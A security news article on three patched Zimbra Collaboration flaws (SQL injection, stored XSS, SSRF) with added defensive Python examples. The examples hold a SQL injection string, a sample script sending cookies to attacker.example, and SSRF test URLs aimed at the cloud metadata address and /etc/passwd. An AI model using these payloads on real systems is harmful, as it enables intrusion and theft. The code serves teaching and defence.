Zimbra, the collaboration software vendor, has released security updates for Zimbra Collaboration that address several vulnerabilities, one of them rated critical. The flaws affect organizations that run Zimbra for mail and collaboration: two of them lead to information disclosure (one exposes email metadata to authenticated users, the other lets the mail server be steered at internal network endpoints), and the third allows script injection into the web client.
SQL Injection Vulnerability
The most severe of the three, CVE-2025-25064, carries a CVSS score of 9.8 out of 10. It is a SQL injection flaw in the ZimbraSync Service SOAP endpoint, affecting 10.0.x releases before 10.0.12 and 10.1.x releases before 10.1.4, and stems from insufficient sanitization of a user-supplied parameter. An authenticated attacker who manipulates that parameter can inject arbitrary SQL into the query the endpoint runs and use it to retrieve sensitive email metadata. Because the injected SQL runs with the application's own database access, the damage is not limited to the attacker's own mailbox, so affected deployments should update promptly.
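The following is an added illustration of the vulnerability class described above, written here as generic Python against an in-memory SQLite table. It is not Zimbra's code and does not reproduce the ZimbraSync endpoint or its query; the table, rows, function names and the injected parameter value are all constructed for the example. One lookup concatenates the request parameter into the SQL text, the other binds it, and the same injected value is sent to both as the user alice.

```python
import sqlite3

# Constructed rows standing in for a per-mailbox metadata table.
SAMPLE_ROWS = [
    ("alice", "msg-1", "Q3 budget", "bob@example.com"),
    ("alice", "msg-2", "Lunch?", "carol@example.com"),
    ("bob",   "msg-3", "Confidential: merger", "ceo@example.com"),
]

# Constructed payload: closes the quoted literal and appends a tautology.
INJECTED_ITEM_ID = "x' OR '1'='1"

def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE mail_item (owner TEXT, item_id TEXT, subject TEXT, sender TEXT)")
    conn.executemany("INSERT INTO mail_item VALUES (?, ?, ?, ?)", SAMPLE_ROWS)
    return conn

def metadata_vulnerable(conn, owner, item_id):
    # The request parameter is pasted into the SQL text, so it can change the query's shape:
    # WHERE owner = 'alice' AND item_id = 'x' OR '1'='1'  matches every row in the table,
    # because AND binds tighter than OR and the tautology is always true.
    sql = ("SELECT item_id, subject, sender FROM mail_item "
           f"WHERE owner = '{owner}' AND item_id = '{item_id}'")
    return conn.execute(sql).fetchall()

def metadata_fixed(conn, owner, item_id):
    # The driver binds the values; the parameter is only ever compared as data.
    sql = "SELECT item_id, subject, sender FROM mail_item WHERE owner = ? AND item_id = ?"
    return conn.execute(sql, (owner, item_id)).fetchall()

def demo():
    """Run the same injected parameter through both lookups as the user 'alice'."""
    conn = make_db()
    leaked = metadata_vulnerable(conn, "alice", INJECTED_ITEM_ID)
    safe = metadata_fixed(conn, "alice", INJECTED_ITEM_ID)
    return leaked, safe

if __name__ == "__main__":
    leaked, safe = demo()
    print("vulnerable lookup returned", len(leaked), "rows, including bob's:", leaked)
    print("parameterised lookup returned", safe)
```

The transport does not matter: whether the parameter arrives in a SOAP body, a query string or a JSON field, it must reach the database as a bound value. Note also that the vulnerable query's owner check is defeated by the same payload, which is why an authenticated flaw of this kind can still expose other users' data.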
Stored XSS Vulnerability
Zimbra also fixed a critical stored cross-site scripting (XSS) vulnerability in the Zimbra Classic Web Client. The issue has not yet been assigned a CVE identifier; Zimbra states that the fix strengthens input sanitization. Stored XSS in a webmail client is particularly dangerous because the injected script runs in the victim's authenticated session whenever the stored content is displayed. The fix is in 9.0.0 Patch 44, 10.0.13 and 10.1.5 (one release per supported branch), so users should upgrade to at least the release for their branch.
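As an added example of the sanitization the previous paragraph refers to, the block below is a generic allowlist sanitizer for HTML that a webmail client stores and later renders. It is not Zimbra's code and says nothing about where the Classic Web Client flaw actually was; the tag and attribute allowlist, the Sanitizer and sanitize names, and the sample message body are all constructed for the illustration. Script and style blocks are dropped with their contents, event-handler attributes are never allowlisted, href values with a javascript: (or other non-http) scheme are removed, and all text is escaped on the way out.

```python
from html import escape
from html.parser import HTMLParser
from urllib.parse import urlsplit

# Allowlist: tags not listed are dropped, attributes not listed are stripped.
ALLOWED_TAGS = {"p", "br", "b", "i", "u", "em", "strong", "a", "ul", "ol", "li", "blockquote"}
ALLOWED_ATTRS = {"a": {"href"}}          # only href is ever kept, so _safe_href covers every kept attribute
SAFE_SCHEMES = {"", "http", "https", "mailto"}   # "" keeps relative links
VOID_TAGS = {"br"}

def _safe_href(value):
    # Browsers ignore control characters and whitespace inside a scheme
    # ("java\tscript:"), so strip them before looking at the scheme.
    cleaned = "".join(ch for ch in value if ch > " " and ch != "\x7f")
    try:
        return urlsplit(cleaned).scheme.lower() in SAFE_SCHEMES
    except ValueError:
        return False

class Sanitizer(HTMLParser):
    """Re-emits only allowlisted markup; all text is escaped on the way out."""

    def __init__(self):
        super().__init__(convert_charrefs=True)   # entities are decoded before we see values
        self.out = []
        self.skip_depth = 0   # > 0 while inside <script>/<style>, whose text is discarded

    def handle_starttag(self, tag, attrs):
        if tag in ("script", "style"):
            self.skip_depth += 1
            return
        if self.skip_depth or tag not in ALLOWED_TAGS:
            return
        kept = []
        for name, value in attrs:
            # on* handlers, style, src etc. are not in the allowlist and are dropped here.
            if name in ALLOWED_ATTRS.get(tag, ()) and value is not None and _safe_href(value):
                kept.append(f' {name}="{escape(value, quote=True)}"')
        self.out.append(f"<{tag}{''.join(kept)}>")

    def handle_endtag(self, tag):
        if tag in ("script", "style"):
            self.skip_depth = max(0, self.skip_depth - 1)
            return
        if not self.skip_depth and tag in ALLOWED_TAGS and tag not in VOID_TAGS:
            self.out.append(f"</{tag}>")

    def handle_data(self, data):
        if not self.skip_depth:
            self.out.append(escape(data, quote=False))

def sanitize(html):
    """Sanitize untrusted HTML before it is stored or rendered."""
    p = Sanitizer()
    p.feed(html)
    p.close()
    return "".join(p.out)

def render_text_field(value):
    """Plain-text fields (subject, display name) get full escaping, no markup at all."""
    return escape(value, quote=True)

# Constructed message body containing the usual stored-XSS vectors.
STORED_BODY = (
    '<p>Hi team,</p>'
    '<script>fetch("https://attacker.example/?c=" + document.cookie)</script>'
    '<p onmouseover="alert(1)">see <a href="javascript:alert(document.domain)">this</a> '
    'and <a href="https://example.com/report">the report</a></p>'
    '<img src=x onerror="alert(1)">'
)

if __name__ == "__main__":
    print(sanitize(STORED_BODY))
    print(render_text_field('<img src=x onerror=alert(1)> quarterly "numbers"'))
```

Two design points carry over to any real implementation: the parser must decode entities before the scheme check (so that an href written as &#106;avascript: is still rejected), and the allowlist must be per tag, since an attribute that is harmless on one element can be an execution sink on another.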
SSRF Vulnerability
Zimbra also patched CVE-2025-25065, a server-side request forgery (SSRF) flaw in the RSS feed parser component, rated medium with a CVSS score of 5.3. The parser retrieves feeds from the mail server itself, and the flaw allowed those requests to be redirected to internal network endpoints, so an attacker could use the server to reach hosts and services that are not exposed externally. The fix ships in 9.0.0 Patch 43, 10.0.12 and 10.1.4.
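The block below is an added, generic illustration of how a server-side feed fetcher defends against this class of flaw; it is not Zimbra's RSS parser and does not describe how the actual fix works. Every hop, including each redirect, is validated before a connection is made: the scheme must be http or https, the host must resolve only to public addresses, and the fetch is pinned to the address that was checked. The function names (validate_feed_url, fetch_feed, is_public_ip), the DNS table and the HTTP responses are all constructed so the example runs offline; a real deployment would plug in getaddrinfo and an HTTP client that connects to the pinned address.

```python
import ipaddress
from urllib.parse import urljoin, urlsplit

MAX_REDIRECTS = 3
ALLOWED_SCHEMES = {"http", "https"}
REDIRECT_STATUSES = {301, 302, 303, 307, 308}

def is_public_ip(addr):
    """True only for addresses a feed fetch may connect to."""
    ip = ipaddress.ip_address(addr)
    # An IPv4-mapped IPv6 address (::ffff:10.0.0.1) must be judged as its IPv4 form.
    if ip.version == 6 and ip.ipv4_mapped is not None:
        ip = ip.ipv4_mapped
    # is_private covers RFC 1918, loopback, link-local (including the 169.254.169.254
    # cloud metadata address), ULA and the documentation/reserved blocks; the remaining
    # flags are checked explicitly for clarity.
    return not (ip.is_private or ip.is_loopback or ip.is_link_local
                or ip.is_multicast or ip.is_reserved or ip.is_unspecified)

def validate_feed_url(url, resolve):
    """Check one URL and return the single IP the fetch is allowed to connect to."""
    parts = urlsplit(url)
    if parts.scheme not in ALLOWED_SCHEMES:
        raise ValueError(f"scheme not allowed: {parts.scheme!r}")
    if parts.username or parts.password:
        raise ValueError("credentials in URL not allowed")
    host = parts.hostname
    if not host:
        raise ValueError("missing host")
    try:
        addrs = [str(ipaddress.ip_address(host))]   # literal address (brackets already stripped)
    except ValueError:
        addrs = resolve(host)                       # name: every A/AAAA answer must pass
    if not addrs or not all(is_public_ip(a) for a in addrs):
        raise ValueError(f"host {host!r} resolves to a non-public address")
    return addrs[0]

def fetch_feed(url, resolve, fetch):
    """Fetch a feed, following redirects manually so every hop is re-validated and each
    connection is pinned to the address that was checked (closes the DNS-rebinding window)."""
    for _ in range(MAX_REDIRECTS + 1):
        addr = validate_feed_url(url, resolve)
        status, location, body = fetch(url, addr)
        if status in REDIRECT_STATUSES:
            if not location:
                raise ValueError("redirect without Location")
            url = urljoin(url, location)            # relative Location headers are allowed
            continue
        return body
    raise ValueError("too many redirects")

# Constructed DNS answers and HTTP responses so the example runs offline.
FAKE_DNS = {
    "feeds.example.com": ["1.2.3.4"],
    "short.example.net": ["5.6.7.8"],
    "rebind.example.org": ["1.2.3.5", "10.0.0.5"],   # one public and one internal answer
}
FAKE_HTTP = {
    ("http://feeds.example.com/rss", "1.2.3.4"): (200, None, "<rss>ok</rss>"),
    ("http://short.example.net/r", "5.6.7.8"): (302, "http://169.254.169.254/latest/meta-data/", None),
}

def fake_resolve(host):
    return FAKE_DNS.get(host, [])

def fake_fetch(url, addr):
    # A real fetcher would open the socket to `addr` and send the Host header taken from `url`.
    return FAKE_HTTP.get((url, addr), (404, None, ""))

FEED_URLS = [
    "http://feeds.example.com/rss",       # plain public feed
    "http://short.example.net/r",         # public host that redirects to the metadata endpoint
    "http://127.0.0.1/",                  # loopback literal
    "http://rebind.example.org/rss",      # name with an internal answer among the public ones
    "file:///etc/passwd",                 # non-HTTP scheme
]

def demo():
    results = {}
    for url in FEED_URLS:
        try:
            results[url] = fetch_feed(url, fake_resolve, fake_fetch)
        except ValueError as err:
            results[url] = f"blocked: {err}"
    return results

if __name__ == "__main__":
    for url, outcome in demo().items():
        print(f"{url:40} {outcome}")
```

The redirect case is the one the advisory text points at: a perfectly public feed host can answer with a Location header aimed at an internal address, so an HTTP client configured to follow redirects automatically bypasses any check that was done only on the original URL. Validating every hop and refusing to resolve a name twice are what turn this into a medium-severity issue rather than a critical one.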
Recommendations for Users
Zimbra strongly advises all customers to upgrade to the latest Zimbra Collaboration release for their branch. The stored XSS fix carries the highest version numbers, so 9.0.0 Patch 44, 10.0.13 and 10.1.5 (or later) contain all three fixes; administrators can confirm the installed release by running zmcontrol -v as the zimbra user. Keeping current with security updates significantly reduces the risk of exploitation and protects the sensitive data these flaws expose.